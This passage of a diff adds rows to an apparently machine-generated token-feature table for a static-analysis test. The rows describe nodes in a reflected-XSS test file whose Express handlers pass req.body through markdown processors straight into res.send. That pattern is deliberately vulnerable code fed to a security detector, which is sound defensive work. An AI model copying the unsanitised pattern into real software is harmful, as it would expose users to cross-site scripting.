processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:50 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:50 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:55 | req.body | CalleeFlexibleAccessPath | unified().use().processSync | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:55 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:55 | req.body | calleeImports | unified | @@ -19968,6 +133917,56 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:55 | req.body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:55 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:55 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:52:72:55 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:52:72:55 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:52:72:55 | body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:52:72:55 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:52:72:55 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:58:72:65 | toString | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:58:72:65 | toString | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:58:72:65 | toString | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:58:72:65 | toString | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:58:72:65 | toString | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:8 | remark | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:8 | remark | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:8 | remark | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:8 | remark | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:8 | remark | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | exceptional return of remark() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | exceptional return of remark() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | exceptional return of remark() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | exceptional return of remark() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | exceptional return of remark() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | remark() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | remark() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | remark() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | remark() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:10 | remark() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:18 | remark().process | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:18 | remark().process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:18 | remark().process | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:18 | remark().process | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:74:18 | remark().process | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | exceptional return of remark( ... OK\\n }) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | exceptional return of remark( ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | exceptional return of remark( ... OK\\n }) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | exceptional return of remark( ... OK\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | exceptional return of remark( ... OK\\n }) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | remark( ... OK\\n }) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | remark( ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | remark( ... OK\\n }) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | remark( ... OK\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:3:76:4 | remark( ... OK\\n }) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:12:74:18 | process | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:12:74:18 | process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:12:74:18 | process | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:12:74:18 | process | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:12:74:18 | process | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:22 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:22 | req | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:22 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:22 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:27 | req.body | CalleeFlexibleAccessPath | remark().process | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:27 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:27 | req.body | calleeImports | remark | @@ -19976,6 +133975,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:27 | req.body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:27 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:20:74:27 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:24:74:27 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:24:74:27 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:24:74:27 | body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:24:74:27 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:24:74:27 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:74:29 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:74:29 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:74:29 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:74:29 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:74:29 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | (e, f) ... OK\\n } | CalleeFlexibleAccessPath | remark().process | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | (e, f) ... OK\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | (e, f) ... OK\\n } | calleeImports | remark | @@ -19984,6 +133998,56 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | (e, f) ... OK\\n } | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | (e, f) ... OK\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | (e, f) ... OK\\n } | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | return of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:30:76:3 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:31:74:31 | e | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:31:74:31 | e | contextSurroundingFunctionParameters | (req, res)\n(e, f) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:31:74:31 | e | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:31:74:31 | e | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:31:74:31 | e | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | contextSurroundingFunctionParameters | (req, res)\n(e, f) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:74:34:74:34 | f | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:7 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:7 | res | contextSurroundingFunctionParameters | (req, res)\n(e, f) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:7 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:7 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:12 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:12 | res.send | contextSurroundingFunctionParameters | (req, res)\n(e, f) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:12 | res.send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:12 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | exceptional return of res.send(f) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | exceptional return of res.send(f) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | exceptional return of res.send(f) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | exceptional return of res.send(f) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | exceptional return of res.send(f) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | res.send(f) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | res.send(f) | contextSurroundingFunctionParameters | (req, res)\n(e, f) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | res.send(f) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | res.send(f) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:5:75:15 | res.send(f) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:9:75:12 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:9:75:12 | send | contextSurroundingFunctionParameters | (req, res)\n(e, f) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:9:75:12 | send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:9:75:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:9:75:12 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:14:75:14 | f | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:14:75:14 | f | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:14:75:14 | f | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19992,12 +134056,62 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:14:75:14 | f | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:14:75:14 | f | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:75:14:75:14 | f | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:1:79:34 | import ... kdown'; | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:1:79:34 | import ... kdown'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:1:79:34 | import ... kdown'; | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | contextSurroundingFunctionParameters | | 